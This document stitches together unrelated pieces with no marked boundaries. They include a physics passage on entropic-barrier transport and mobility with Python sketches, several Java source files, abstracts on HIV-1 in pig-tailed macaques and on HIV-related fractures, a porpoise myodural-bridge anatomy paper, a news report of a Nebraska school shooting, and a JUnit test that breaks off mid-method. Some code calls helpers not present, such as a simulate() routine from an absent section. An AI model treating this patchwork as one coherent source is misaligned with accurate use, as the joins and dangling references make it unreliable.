Fig. 5 shows the nonlinear mobility as a function of the scaling parameter f. We note that transport in one-dimensional periodic energetic potentials differs distinctly from that occurring in one-dimensional periodic systems in the presence of entropic barriers. The fundamental difference lies in the temperature dependence of these barrier shapes. Decreasing the temperature in an energetic periodic potential decreases the transition rates from one cell to the neighboring one by decreasing the Arrhenius factor exp{−ΔV/(k_B T)}, where ΔV denotes the activation energy necessary to proceed over a period. Hence, decreasing the temperature yields a decreasing nonlinear mobility. For a one-dimensional periodic system with an entropic free energy (or entropic potential of mean force), a decrease of temperature results, however, in an increase of the dimensionless force parameter f and consequently in a monotonic increase of the nonlinear mobility, cf. Fig. 5. The dependence of the dynamics on the geometry parameter a nicely reflects the entropic effects on the mobility: a channel with a larger a-value has wider openings and thus provides more configuration space in which the particle can sojourn. This longer residence time within a period of the channel diminishes the throughput and consequently the mobility. This is corroborated by the results of our calculations depicted in Fig. 5.
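The ensemble average of Eq. (4.4) can be estimated directly from simulated trajectories; the sketch below reuses the simulate() routine from the Sec. 2 sketch, with deliberately small trajectory counts and finite times standing in for the long-time limit.

import numpy as np

def mobility_from_trajectories(f, n_traj=100, n_steps=50_000, dt=1e-5):
    """Estimate mu(f) = <x_dot>/f from an ensemble of Langevin trajectories."""
    rng = np.random.default_rng(1)
    final_x = [simulate(f, n_steps=n_steps, dt=dt, rng=rng)[0]
               for _ in range(n_traj)]
    avg_velocity = np.mean(final_x) / (n_steps * dt)
    return avg_velocity / f

print(mobility_from_trajectories(f=10.0))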
For all values of f, an increase in the value of a leads to a decrease in the mobility. This holds not only in regimes for which the FJ equation is valid, but also for large values of f where the approximation fails. For very large values of the scaling parameter f the nonlinear mobility approaches the value 1, i.e., it agrees with the deterministic strong-driving limit. By means of the nonlinear mobility, a detailed comparison between the 2D simulation results and the analytic result, cf. Eq. (3.6), enables one to determine validity criteria for the FJ approximation.

Effective diffusion and the Sutherland-Einstein relation

The validity of a nonlinear Sutherland-Einstein relation would imply that, in physical units, we can relate the nonlinear mobility μ(F) directly to the nonlinear, effective x-diffusion D_eff(F), reading

μ(F) = D_eff(F) / (k_B T) .   (5.1)

Put differently, the effective diffusion coefficient D_eff for the diffusive spreading along the longitudinal channel direction would then solely be determined by the nonlinear mobility discussed above and the environmental temperature T. The validity of this relation would then imply a monotonic increase towards the entropic-free diffusion limit, i.e., D_eff = k_B T / γ. The latter is approached in the strong-forcing limit, where entropic effects cease to play a significant role. Such a monotonic behavior, however, is not observed in the numerical simulations of the effective x-diffusion coefficient. It is defined via the asymptotic ratio between the variance of the position variable and the elapsed time t, i.e.,

D_eff := lim_{t→∞} [ ⟨x²(t)⟩ − ⟨x(t)⟩² ] / (2t) .   (5.2)

Interestingly, the dependence of the effective diffusion coefficient on the scaling parameter exhibits a bell-shaped behavior, cf. the inset of Fig. 6, thus indicating a failure of the Sutherland-Einstein relation in this moderate-to-strong driving regime. This breakdown of the Sutherland-Einstein relation can also be detected within the FJ description (not shown in Fig. 6): the FJ approximation for this effective x-diffusion yields as well a non-monotonic dependence of the effective x-diffusion coefficient on the scaling parameter f, exhibiting a peak value exceeding the bulk diffusion. For a detailed comparison, we depict the ratio of the numerically obtained D_eff and μ(F) k_B T in Fig. 6. Surprisingly, it turns out that such a Sutherland-Einstein relation, Eq. (5.1), holds true in terms of the effective mobility in the small-forcing limit f → 0, i.e., in the linear-response regime. It increasingly fails, however, for increasing bias strength F. At very strong bias, i.e., f → ∞, the biased diffusion becomes effectively "free" of entropic effects and expectedly approaches the free limit, given by k_B T / γ, which recovers the original, linear Sutherland-Einstein result in terms of the F-independent mobility μ = 1/γ. Put differently, the influence of entropic barriers caused by the bottlenecks becomes negligible at strong bias. Vice versa, the bell-shaped behavior of the ratio depicted in Fig. 6 reflects the fact that this effective diffusion does not increase monotonically but rather exhibits an enhancement of the effective diffusion at moderate bias (or scaling) values f, cf. the inset of Fig. 6.
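Analogously, the defining limit (5.2) suggests a direct estimator of D_eff from a trajectory ensemble, again reusing simulate() from the Sec. 2 sketch; in practice the limit is approximated by a long but finite simulation time, and the parameters here are illustrative.

import numpy as np

def effective_diffusion(f, n_traj=200, n_steps=50_000, dt=1e-5):
    """Estimate D_eff = lim Var[x(t)] / (2 t) from an ensemble of trajectories."""
    rng = np.random.default_rng(2)
    final_x = np.array([simulate(f, n_steps=n_steps, dt=dt, rng=rng)[0]
                        for _ in range(n_traj)])
    t = n_steps * dt
    return final_x.var() / (2.0 * t)

for f in (0.0, 1.0, 10.0, 100.0):
    print(f, effective_diffusion(f))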
Conclusions

In summary, we demonstrated the applicability of the equilibration approximation in describing biased diffusive transport occurring in narrow, irregularly shaped one-dimensional channel structures. The Fick-Jacobs (FJ) description, which relies on the equilibration assumption, allows for a treatment of the dynamics within an effective one-dimensional kinetic equation of the Smoluchowski form. Bottlenecks and other confining restrictions of the available configuration space yield, within this approximation, an effective 1D diffusion equation exhibiting entropic barriers. Due to the intrinsic temperature dependence of the underlying entropic free-energy contribution, one finds for the transport phenomena in periodic channels possessing varying cross-sections features that are radically different from conventional transport occurring in energetic periodic potential landscapes. The most striking difference between these two physical situations is that for a fixed channel geometry the dynamics is characterized by a single scaling parameter f = F L / (k_B T), which combines the external force F causing a drift, the period length L of the channel, and the thermal energy k_B T. The latter presents a measure of the strength of the acting fluctuating thermal forces. This leads to an opposite temperature dependence of the mobility: while the mobility of a particle in an energetic potential increases with increasing temperature, the mobility of a particle undergoing biased diffusion in an irregular channel decreases. The incorporation of the spatial variation of the channel width in terms of an entropic free-energy contribution allows for a quantitative understanding of the dependence of the transport properties, like the nonlinear mobility, on parameters like the force strength, the channel topology or the temperature. Moreover, the lateral steady-state probability densities P_st(x) can be evaluated in analytical closed form within the reduced kinetic FJ approximation, see the Appendix. Such an effective one-dimensional reduction of a complex diffusion dynamics with intricate boundary conditions at the confining walls certainly proves useful and beneficial for the quantitative description, design and control of diffusive transport along tortuous pores and the like. The latter situation dictates the stochastic far-from-equilibrium transport in a great variety of biological and structured synthetic pores and confining cavities, such as buckyballs, zeolites and the like. As an example, this FJ approximation has successfully been used in describing the phenomenon of Stochastic Resonance (Hänggi, 2002) in a 2D system exhibiting an entropic barrier.

Appendix

In the steady state the probability current of Eq. (3.3) is constant, J_st = const., and the kinetic equation simplifies to

J_st = −D(x) e^{−A(x)} (d/dx) [ e^{A(x)} P_st(x) ] .   (A 8)

Upon rearranging the terms on the right-hand side and integrating once more over a period, i.e., from 0 to 1, we find the first result

J_st ∫ from 0 to 1 of I(x, f) dx = 1 − e^{−f} ,   (A 9)

with I(x, f) defined in Eq. (3.5). Hereby, we made use of the normalization condition of the stationary probability, i.e., ∫ from 0 to 1 of P_st(x) dx = 1, together with the periodicity P_st(x + 1) = P_st(x) and A(x + 1) = A(x) − f. The general relation between the steady-state probability current J_st and the steady-state average particle current ⟨ẋ⟩ is

⟨ẋ⟩ = ∫ from 0 to 1 of J_st dx ,   (A 10)

which implies that ⟨ẋ⟩ = J_st. Thus, the transport current is given by the first main result, reading

⟨ẋ⟩ = (1 − e^{−f}) / ∫ from 0 to 1 of I(x, f) dx .   (A 11)

By substituting Eq. (A 9) back into Eq. (A 8), we obtain for the steady-state probability density in the x-direction the second main result:

P_st(x) = I(x, f) / ∫ from 0 to 1 of I(z, f) dz .   (A 12)
package com.bobobode.cs;

import lombok.NonNull;

import java.util.Arrays;

public class MergeSort {

    public static void main(String[] args) {
        int[] array = new int[]{6, 5, 3, 1, 8, 7, 2, 4, 9};
        var sortedArray = sort(array);
        Arrays.stream(sortedArray).forEach(System.out::print);
    }

    private static int[] sort(@NonNull int[] array) {
        // Base case also covers empty arrays (original checked == 1 only,
        // which would recurse forever on a zero-length input).
        if (array.length <= 1) {
            return array;
        } else {
            int[] arrayLeft = Arrays.copyOfRange(array, 0, array.length / 2);
            int[] arrayRight = Arrays.copyOfRange(array, array.length / 2, array.length);
            arrayLeft = sort(arrayLeft);
            arrayRight = sort(arrayRight);
            // Debug output: print the two sorted halves before merging.
            Arrays.stream(arrayLeft).forEach(System.out::print);
            Arrays.stream(arrayRight).forEach(System.out::print);
            System.out.println();
            return merge(arrayLeft, arrayRight);
        }
    }

    private static int[] merge(int[] arrayL, int[] arrayR) {
        int[] result = new int[arrayL.length + arrayR.length];
        int leftIndex = 0;
        int rightIndex = 0;
        int mergedIndex = 0;
        // Repeatedly take the smaller head element of the two sorted halves.
        while (leftIndex < arrayL.length && rightIndex < arrayR.length) {
            if (arrayL[leftIndex] < arrayR[rightIndex]) {
                result[mergedIndex] = arrayL[leftIndex];
                leftIndex++;
            } else {
                result[mergedIndex] = arrayR[rightIndex];
                rightIndex++;
            }
            mergedIndex++;
        }
        // Copy any remaining elements from either half.
        while (leftIndex < arrayL.length) {
            result[mergedIndex] = arrayL[leftIndex];
            leftIndex++;
            mergedIndex++;
        }
        while (rightIndex < arrayR.length) {
            result[mergedIndex] = arrayR[rightIndex];
            rightIndex++;
            mergedIndex++;
        }
        return result;
    }
}
package com.js.interpreter.runtime;

import com.js.interpreter.runtime.exception.RuntimePascalException;

/** A mutable reference to a Pascal value of type T. */
public interface PascalReference<T> {

    void set(T value);

    T get() throws RuntimePascalException;
}
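For illustration, a minimal in-memory implementation of this interface might look as follows; the class name SimplePascalReference is a hypothetical example and not part of the original interpreter code base.

package com.js.interpreter.runtime;

import com.js.interpreter.runtime.exception.RuntimePascalException;

/** Hypothetical example implementation backed by a plain field. */
public class SimplePascalReference<T> implements PascalReference<T> {

    private T value;

    public SimplePascalReference(T initial) {
        this.value = initial;
    }

    @Override
    public void set(T value) {
        this.value = value;
    }

    @Override
    public T get() throws RuntimePascalException {
        return value;
    }
}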
Vif Substitution Enables Persistent Infection of Pig-Tailed Macaques by Human Immunodeficiency Virus Type 1 ABSTRACT Among Old World monkeys, pig-tailed macaques (Pt) are uniquely susceptible to human immunodeficiency virus type 1 (HIV-1), although the infection does not persist. We demonstrate that the susceptibility of Pt T cells to HIV-1 infection is due to the absence of postentry inhibition by a TRIM5 isoform. Notably, substitution of the viral infectivity factor protein, Vif, with that from pathogenic SIVmne enabled replication of HIV-1 in Pt T cells in vitro. When inoculated into juvenile pig-tailed macaques, the Pt-tropic HIV-1 persistently replicated for more than 1.5 to 2 years, producing low but measurable plasma viral loads and persistent proviral DNA in peripheral blood mononuclear cells. It also elicited strong antibody responses. However, there was no decline in CD4+ T cells or evidence of disease. Surprisingly, the Pt-tropic HIV-1 was rapidly controlled when inoculated into newborn Pt macaques, although it transiently rebounded after 6 months. We identified two notable differences between the Pt-tropic HIV-1 and SIVmne. First, SIV Vif does not associate with Pt-tropic HIV-1 viral particles. Second, while Pt-tropic HIV-1 degrades both Pt APOBEC3G and APOBEC3F, it prevents their inclusion in virions to a lesser extent than pathogenic SIVmne. Thus, while SIV Vif is necessary for persistent infection by Pt-tropic HIV-1, improved expression and inhibition of APOBEC3 proteins may be required for robust viral replication in vivo. Additional adaptation of the virus may also be necessary to enhance viral replication. Nevertheless, our data suggest the potential for the pig-tailed macaque to be developed as an animal model of HIV-1 infection and disease.
package com.lyl.boon.net.api;

import com.lyl.boon.net.entity.WanAndroidEntity;

import retrofit2.http.GET;
import retrofit2.http.Path;
import rx.Observable;

/**
 * Wing_Li
 * 2016/3/30.
 */
public interface WanAndroidApi {

    @GET("article/list/{page}/json")
    Observable<WanAndroidEntity> getWanAndroidList(@Path("page") int page);
}
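A sketch of how this interface would typically be wired up with Retrofit and RxJava 1.x (matching the rx.Observable return type above); the base URL, the Gson converter, and the demo class itself are assumptions, since the project's actual configuration is not shown in this excerpt.

import retrofit2.Retrofit;
import retrofit2.adapter.rxjava.RxJavaCallAdapterFactory;
import retrofit2.converter.gson.GsonConverterFactory;

import com.lyl.boon.net.api.WanAndroidApi;

public class WanAndroidApiDemo {
    public static void main(String[] args) {
        // Hypothetical wiring; assumes retrofit2 with the Gson converter and
        // the RxJava 1.x call adapter on the classpath. Base URL is an assumption.
        Retrofit retrofit = new Retrofit.Builder()
                .baseUrl("https://www.wanandroid.com/")
                .addConverterFactory(GsonConverterFactory.create())
                .addCallAdapterFactory(RxJavaCallAdapterFactory.create())
                .build();

        WanAndroidApi api = retrofit.create(WanAndroidApi.class);
        api.getWanAndroidList(0).subscribe(
                entity -> System.out.println("loaded page 0"),
                Throwable::printStackTrace);
    }
}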
package com.rslakra.dspringcore.repository;

// NOTE: the package and import paths below are assumptions inferred from the
// @see reference; the excerpt does not show the original import block.
import java.util.ArrayList;
import java.util.List;

import org.springframework.stereotype.Repository;

/**
 * @author Rohtash Singh Lakra
 * @version 1.0.0
 */
@Repository("customerRepository")
public class CustomerRepositoryImpl implements CustomerRepository {

    public CustomerRepositoryImpl() {
    }

    /**
     * (non-Javadoc)
     *
     * @see com.rslakra.dspringcore.repository.CustomerRepository#findCustomers()
     */
    @Override
    public List<Customer> findCustomers() {
        List<Customer> customers = new ArrayList<>();
        customers.add(newCustomer("Rohtash", "Lakra"));
        customers.add(newCustomer("Rohtash", "Singh"));
        customers.add(newCustomer("Rohtash", "Singh", "Lakra"));
        customers.add(newCustomer("Sangita", "Lakra"));
        return customers;
    }

    /**
     * Creates a customer without a middle name.
     *
     * @param firstName the customer's first name
     * @param lastName  the customer's last name
     * @return a new {@code Customer}
     */
    private Customer newCustomer(String firstName, String lastName) {
        return newCustomer(firstName, null, lastName);
    }

    /**
     * Creates a customer with the given names.
     *
     * @param firstName  the customer's first name
     * @param middleName the customer's middle name (may be {@code null})
     * @param lastName   the customer's last name
     * @return a new {@code Customer}
     */
    private Customer newCustomer(String firstName, String middleName, String lastName) {
        Customer customer = new Customer();
        customer.setFirstName(firstName);
        customer.setMiddleName(middleName);
        customer.setLastName(lastName);
        return customer;
    }
}
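The Customer bean itself is not shown in this excerpt; a minimal sketch consistent with the setters used above (its actual fields and package are assumptions) would be:

// Minimal sketch of the Customer bean used above; the real class may carry
// more fields. The field set here is inferred only from the setters called.
public class Customer {

    private String firstName;
    private String middleName;
    private String lastName;

    public String getFirstName() { return firstName; }
    public void setFirstName(String firstName) { this.firstName = firstName; }

    public String getMiddleName() { return middleName; }
    public void setMiddleName(String middleName) { this.middleName = middleName; }

    public String getLastName() { return lastName; }
    public void setLastName(String lastName) { this.lastName = lastName; }
}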
Occipital-Dural Muscle: A Specialized Myodural Bridge in Narrow-Ridged Finless Porpoise (Neophocaena asiaeorientalis) A dense bridge-like tissue named the myodural bridge (MDB), connecting the suboccipital muscles and the spinal dura mater, was originally discovered in humans. Recent studies have revealed that the MDB is a universally existing normal anatomical structure in mammals and is considered significant in physiological function. Our previous investigations confirmed the existence of the MDB in finless porpoises. We conducted this research to expound the specificity of the MDB in Neophocaena asiaeorientalis (N. asiaeorientalis). Five formalin-fixed carcasses of N. asiaeorientalis were used for this study. Two were used for head and neck CT scanning, three-dimensional reconstruction, and dissection of the suboccipital region; one was used for P45 plastinated-sheet observation; one for histological analysis of the suboccipital region; and one for scanning electron microscopic study. The results showed that the MDB in N. asiaeorientalis is an independent muscle that originates from the caudal border of the occiput, extends directly through the posterior atlanto-occipital interspace, and connects with the cervical spinal dura mater. Thus the MDB in N. asiaeorientalis is an independent, specialized muscle. Based on the origin and termination of this muscle, we name it the occipital-dural muscle. Its direct pull on the cervical spinal dura mater might affect the circulation of the cerebrospinal fluid (CSF) by altering the volume of the spinal subarachnoid space. Introduction In the human body, the suboccipital region is a particularly intricate area that contains a bundle of connective tissue connecting the rectus capitis posterior minor (RCPmi) and the cervical spinal dura mater (SDM) as an anatomical bridge. This bridge-type connection was first found in the human atlanto-occipital interspace by Khan et al. and termed the myodural bridge (MDB) by Hack et al. Subsequent studies revealed that the rectus capitis posterior major (RCPma), the nuchal ligament (NL), and the obliquus capitis inferior (OCI) also participate in forming the MDB. Furthermore, researchers found that the MDB exists in additional mammalian taxa including Macaca mulatta, Canis familiaris, Felis catus, Oryctolagus cuniculus, Rattus norvegicus, Cavia porcellus, and the Indo-Asian finless porpoise. In addition, it was confirmed that this structure is also present in reptiles (Crocodylus siamensis) and avifauna (Columba livia and Gallus domesticus). This universal existence suggests that the MDB could be physiologically significant in both humans and other species. According to morphological studies, the authors speculated that the MDB is related to the transmission of proprioception. Zheng et al. and Xu et al. proposed that the MDB could be an indispensable factor in modulating the dynamic circulation of the cerebrospinal fluid (CSF). The narrow-ridged finless porpoise (N. asiaeorientalis) is one of the smallest cetaceans. Since 2017, Neophocaena asiaeorientalis has been listed as endangered by the IUCN. Besides, a range of evidence indicates that finless porpoises form the most basal clade among extant porpoises of the family Phocoenidae. A previous study has confirmed the existence of the MDB in Neophocaena phocaenoides, yet the posterior atlanto-occipital (PAO) membrane was not found.
In addition, the first three vertebrae in the finless porpoise are fused, so that the only remaining entrance for the MDB to reach the SDM is the atlanto-occipital interspace. More interestingly, we found a muscle inserting through the atlanto-occipital interspace and terminating at the SDM, which might perform the role of the MDB in N. asiaeorientalis. According to morphological studies of the finless porpoise, the suboccipital triangle is quite different from that of humans and other species, and no obliquus muscle could be found. We therefore initiated this research to investigate this muscle inserting into the atlanto-occipital interspace in N. asiaeorientalis, to figure out its relationship to the MDB in humans, and to infer its physiological function. Materials and Methods Analyzed specimens represent narrow-ridged finless porpoises (N. asiaeorientalis) that were killed incidentally in fishing nets or were found washed ashore. They were successively collected in Dalian with permission from the Chinese authorities for animal protection. The study of these carcasses was approved by the Ethics Committee of Dalian Medical University. All of the collected carcasses underwent arterial perfusion through the aorta with 10% formalin solution. All methods were carried out in accordance with relevant guidelines and regulations. Methods. CT three-dimensional reconstruction: two specimens' heads and necks were continuously scanned with a GE 128-row VCT scanner, and dual-phase serial computed tomography (CT) images were obtained; the slice thickness and pitch were set to 0.6 mm. The images were analyzed for modeling and reconstruction in MIMICS software (MIMICS 18.0.0.525, Materialise, Leuven, Belgium). Dissection of the postoccipital region: four specimens were dissected layer by layer at the posterior occipital region to expose the atlanto-occipital interspace. A dorsal midline incision was made at the neck; the skin, subcutaneous fascia, and superficial neck muscles were gradually removed to expose the deep postoccipital musculature. Subsequently, the rectus capitis dorsalis (RCD) was carefully detached from its cranial attachment to reveal the other muscle lying deeper. The musculature and other structures in the atlanto-occipital interspace, along with a part of the cervical spinal dura mater, were isolated as tissue blocks with an electric handsaw. The tissue blocks were preserved for histology and scanning electron microscopy. Photographic documentation was carried out with Canon 7D and 450D cameras. P45 sheet plastination: one specimen of N. asiaeorientalis was sliced in the sagittal plane for P45 sheet plastination. The P45 sections are semi-transparent, durable slices with a clear delineation of tissue morphology, including the connective tissues. Anatomical structures in the posterior occipital region and the connections between the postoccipital muscles and the cervical spinal dura mater were observed. The experimental procedure of the technique is described as follows: Slicing. The embalmed head-and-neck specimens were frozen at −70°C for two weeks, then embedded in polyurethane foam and frozen at −70°C again for two days. After freezing, 3 mm sagittal slices were made from side to side with a high-speed band saw. Bleaching. All the slices were rinsed overnight in cold running water and afterwards immersed in 5% dioxogen overnight. Dehydration. After bleaching, the slices were dehydrated with 100% acetone by the freeze-substitution method. Casting and forced impregnation.
After dehydration, the casting mold was prepared. The slices were lifted from the acetone bath and placed between two glass plates. The molds were then filled with polyester (Hoffen polyester P45, Dalian Hoffen Bio-Technique Co. Ltd., Dalian, P. R. China). The filled mold was placed upright in a vacuum chamber at room temperature for impregnation. The absolute pressure was slowly decreased to 20, 10, 5, and 0 mm Hg, according to the rate of bubble release, and was maintained at 0 mm Hg until bubbling ceased. Impregnation lasted for more than eight hours. Curing. After the vacuum was released, air bubbles within the sheets were checked for and removed. The top of the mold was clamped with large fold-back clamps, and the sheet was then ready for curing. The sheets were cured in a heated water bath, placed upright at 40°C for 3 days. After curing, the sheets were removed from the bath and cooled to room temperature in a rack. The slices were then removed from the flat chamber and covered appropriately with adhesive plastic wrap for protection. The sheets were then observed and photographed. Histological study: two tissue blocks were prepared containing the postoccipital musculature, the periosteum of the adjacent cervical vertebrae and the occiput, the adjoining spinal dura mater, and the spinal cord. After washing in running water overnight, these tissue blocks were dehydrated in ethanol of increasing grades, passed through xylene, infiltrated, and then embedded in paraffin wax. A rotary microtome was used to cut 10-μm-thick sections. Sections were mounted on glass microscope slides and rehydrated for Van Gieson (VG; picric acid and acid fuchsin) staining. The stained sections were analyzed and photographed under a Nikon Eclipse 80i light microscope with the support of Nikon NIS image software. Scanning electron microscopic study: two tissue blocks obtained through layer-by-layer dissection were used for the scanning electron microscope (SEM) study. After washing in running water overnight, the specimens were fixed with 2.5% glutaraldehyde in 0.1 M phosphate buffer at pH 7.3 for more than 2 h. The specimens were then repeatedly washed in the buffer solution, dehydrated through a graded alcohol series, vacuum dried with 100% tert-butyl alcohol, and sputter-coated with platinum using ION SPUTTER JFC-1100 ion-sputtering equipment. The specimens were observed under a scanning electron microscope (model FEI Quanta 200, voltage: 20 kV; manufacturer: FEI Company, the Netherlands). Fiber connections were photographed, digitized, and analyzed. CT three-dimensional reconstruction: the reconstructed 3D model of the cranium and cervical vertebrae of N. asiaeorientalis demonstrated that the atlanto-occipital interspace, leading to the cervical dura mater, is broader than in humans and some other terrestrial mammals. The first three cervical vertebrae merged into one unit, with the spinous processes and transverse processes fused as well (Fig. 1). Since the relationships of the bones were clearly demonstrated by the 3D records, they also served as guidance for the gross anatomy in this study. Gross anatomy: with the fusion of the first three vertebrae, the obliquus muscle is absent in N. asiaeorientalis. A rectus muscle was found in the deep postoccipital region (Fig. 2). The cranial attachment of this rectus muscle was on the occiput, while the caudal attachment was on the transverse process of the fused cervical vertebrae.
This muscle was the rectus capitis dorsalis muscle (RCD). Another muscle was found underneath the RCD, which originated from the occiput and ended at the spinal dura mater; we named it 'the occipital-dural muscle' (Fig. 3). The dorsal atlanto-occipital (DAO) membrane was not found in N. asiaeorientalis during the dissection. P45 sheet plastination: median sagittal sections of the plastination sheets showed that all the fibers of the occipital-dural muscle extended into the atlanto-occipital interspace and ultimately attached to the cervical spinal dura mater (Fig. 4). The dorsal atlanto-occipital (DAO) membrane was not present throughout the observation of the sheets. In addition, we found a reverse angle between the cranial and spinal dura mater. Histology: through the histological analysis of VG staining, the relationship between the muscles, the bony structures, and the cervical dura mater was clearly identified (Fig. 5). The proximal attachment of the RCD was on the occiput, while the distal attachment was on the fused cervical vertebrae. All of the muscular fibers of the occipital-dural muscle inserted into the atlanto-occipital interspace and terminated by merging directly with the cervical spinal dura mater. Neither could we find the dorsal atlanto-occipital (DAO) membrane in the histological sections. In the VG-stained sections, the muscular fibers of the occipital-dural muscle stained yellow; on entering the atlanto-occipital interspace, the extending fibers turned red, revealing that the extended parts were collagenous fibers, i.e., muscle tendon. Observation under the scanning electron microscope: on the sagittal section, the cervical spinal dura mater was composed of multilayer fiber bundles. The dorsal atlanto-occipital (DAO) membrane was absent in the atlanto-occipital interspace under the scanning electron microscope as well. The muscular fibers of the occipital-dural muscle extended through the atlanto-occipital interspace, arranged in parallel, ran caudally, and merged with the cervical spinal dura mater at their ends. We observed that the tendon fibers of the occipital-dural muscle were knitted into the cervical spinal dura mater as a fusion (Fig. 6). Discussion The myodural bridge was described as a dense fibrous connection between the suboccipital muscles and the SDM by Hack et al., and subsequent studies enriched this definition stage by stage. Until now, we have not found a species other than the finless porpoises in which the MDB is an isolated muscle, yet in all species the muscle tendon ultimately terminates at the SDM. Meanwhile, the physiological significance of the MDB has attracted much attention in recent research. Sui et al. and Zheng et al. proposed that the suboccipital muscles, connecting to the upper cervical spinal dura mater via the MDB, provide power for cerebrospinal fluid (CSF) circulation. Thereby, Xu et al. speculated that head movement could be a significant contributor to CSF dynamics at the craniocervical junction, besides previously mentioned factors such as heartbeat and respiration. Finless porpoises have a wide geographic range, occurring in shallow coastal waters of the western Pacific and Indian Oceans from the Persian Gulf through most of the Indo-Malay region and then northward through the waters of China (including the lower and middle reaches of the Yangtze River) to southern Japan and Korea. The narrow-ridged finless porpoise (N. asiaeorientalis) has no dorsal fin, is more slender than other porpoise species, and has a flexible neck.
They have tubercles on the back from mid-back to tail, with a dorsal ridge anywhere from 0.2 to 1.2 cm wide. Regarding marine mammals, our team recently confirmed the existence of the MDB in the finless porpoise (Neophocaena phocaenoides) and the sperm whale. Like most marine mammals, N. asiaeorientalis must hold its breath and dive while foraging in aquatic habitats. During dives, these animals apparently face extensive apnea, similar to their related species, the harbor porpoise. To tolerate this, the dive response has become a crucial trait, consisting of bradycardia and peripheral vasoconstriction. Through this response, cardiac output and organ perfusion are diminished while respiration transiently ceases. Such processes scarcely occur in terrestrial mammals; that is, compared with their terrestrial counterparts, marine mammals routinely confront challenges stemming from the dive response. Coincidentally, heartbeat and respiration are considered crucial contributors to maintaining CSF circulation, yet marine mammals must reduce both during dives. Here we found that the MDB in N. asiaeorientalis is isolated as an independent muscle that originates from the occiput, extends through the atlanto-occipital interspace, and terminates at the spinal dura mater. It has already been confirmed that this muscle is present in Neophocaena phocaenoides without a PAO membrane serving as an intermediate junction. Neither could we find any termination other than the SDM in N. asiaeorientalis; in other words, pulling the SDM might be the main job of the occipital-dural muscle in N. asiaeorientalis. During the finless porpoise's dive time, the lowered heart rate and suspended respiration cannot provide the power needed to maintain CSF circulation; simultaneously, a specialized muscle objectively exists that can deliver a powerful traction force to the SDM through the relative movement between head and neck. We therefore predict that this muscle plays an indispensable role in the dynamic circulation of CSF in N. asiaeorientalis. Moreover, this mechanism is steadily sustainable owing to continuous body motion during the bottom time of finless porpoises. Therefore, we call this unique and functionally specialized muscle the occipital-dural muscle. As subsequent research reported that the myodural bridge exists universally in mammals, the MDB is considered a highly evolutionarily conserved structure. The myodural bridge of N. asiaeorientalis is the strongest and most specialized among the animals we have examined. Owing to the absence of the PAO membrane, the occipital-dural muscle inserts into the atlanto-occipital interspace and attaches to the dura mater directly. In addition, the scanning electron microscopic results revealed that the connection between the MDB and the dura mater in N. asiaeorientalis is close-knit: the dense tissue of the MDB gradually fuses with the SDM and eventually becomes part of it. In summary, all the evidence above supports that the MDB in N. asiaeorientalis works efficiently as an isolated muscle, named the occipital-dural muscle. Unlike in humans, this muscle connects directly with the SDM, transmitting strong traction force to it through muscular contraction and relaxation. Furthermore, this mechanism is also highly related to the sustained relative movement between the occiput and the fused first three cervical vertebrae (Fig. 7).
This mechanism is clearly more powerful and representative than that in humans and in most other species we have investigated. Meanwhile, it strengthens the case for a significant physiological function of the MDB.
A US student who shot two school officials, killing one, had been suspended for 19 days just before the attack, officials have said. Robert Butler, who killed himself after the attack at his Nebraska school, had just been punished for driving over the school football pitch. Police said the gun he used belonged to his father, an Omaha police detective. No other students were injured in the attack. The school principal is in hospital and is expected to survive. Robert, 17, had recently transferred to Millard South High School in Omaha from Lincoln, another city where he had lived with his mother, the Omaha World-Herald reported. The newspaper reported that over the winter holidays Robert had been penalised by police for driving his car over the school football pitch and athletics track, and on the Wednesday morning before the attack was suspended from school by Vice Principal Vicki Kaspar. He went home, took a gun belonging to his father while his father was out of the house, and returned to school. After speaking to Ms Kaspar for several minutes with the door closed, he reportedly shot her several times in the chest, then shot Principal Curtis Case and fired more rounds. He fled and was later found dead of a self-inflicted gunshot wound in his still-running car, police told local media. Ms Kaspar, 58, later died in hospital; Mr Case, 45, was in serious condition in hospital. On a Facebook page, Butler apparently ranted that people would hear about "evil" things he had done and said the school had driven him to violence. Marissa Barton, who attends a school near Millard South, said her school was locked down and that students had gone into a panic after the shooting. "There is a sombre feeling throughout the city," she told the BBC. "This tragedy has hit the entire community hard. I'm still in shock."
Do people with HIV infection have a higher risk of fracture compared with those without HIV infection? Purpose of review: This review details recent findings that inform the prevalence and incidence of fractures in people living with HIV (PLWH) and examines the effects of HIV infection and antiretroviral therapy (ART), as well as demographics and traditional risk factors, on fractures. As antiretroviral guidelines have recently changed to recommend the introduction of ART at diagnosis of HIV infection, the long-term effects of ART on bone health and fracture risk need to be better understood. Recent findings: It is apparent that both the effects of HIV infection alone and the initiation of ART are associated with significant bone loss in individuals with HIV infection, resulting in osteopenia and osteoporosis. The clinical consequence of low bone mineral density is a greater risk of fragility fractures, which are more common in older HIV patients and those on ART. Frailty occurs at a prevalence of about 10% (about twice that of the general population), and the increased propensity for falls results in greater fracture prevalence, morbidity, and mortality. Summary: This review examines data from recent cohort studies and clinical trials to inform a better understanding of the complex relationship between the effects of HIV infection, ART, and demographics on fractures in PLWH.
package pl.pjagielski;

import static javax.ws.rs.core.Response.Status.BAD_REQUEST;
import static javax.ws.rs.core.Response.Status.CREATED;
import static javax.ws.rs.core.Response.Status.OK;
import static junitparams.JUnitParamsRunner.$;
import static org.fest.assertions.Assertions.assertThat;

import javax.ws.rs.client.Client;
import javax.ws.rs.client.ClientBuilder;
import javax.ws.rs.client.Entity;
import javax.ws.rs.client.WebTarget;
import javax.ws.rs.core.Response;

import org.joda.time.DateTime;
import org.junit.AfterClass;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import org.junit.runner.RunWith;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.datatype.joda.JodaModule;
import com.fasterxml.jackson.jaxrs.json.JacksonJaxbJsonProvider;
import com.fasterxml.jackson.jaxrs.json.JacksonJsonProvider;

import junitparams.JUnitParamsRunner;
import junitparams.Parameters;
import pl.pjagielski.model.Todo;
import pl.pjagielski.model.TodoBuilder;

@RunWith(JUnitParamsRunner.class)
public class TodoEndpointIntegrationTest {

    private static EmbeddedJetty embeddedJetty;

    private Client client = createClient();
    private TodoEndpoint proxyClient;
    private Todo existingTodo;

    @Before
    public void setup() throws Exception {
        existingTodo = createTodo();
    }

    @Test
    @Parameters(method = "provideValidTodosForCreation")
    public void shouldCreateTodo(Todo todo) {
        Response response = createTarget().request().post(Entity.json(todo));

        assertThat(response.getStatus()).isEqualTo(CREATED.getStatusCode());
        Todo createdTodo = response.readEntity(Todo.class);
        assertThat(createdTodo.getId()).isNotNull();
    }

    private static Object[] provideValidTodosForCreation() {
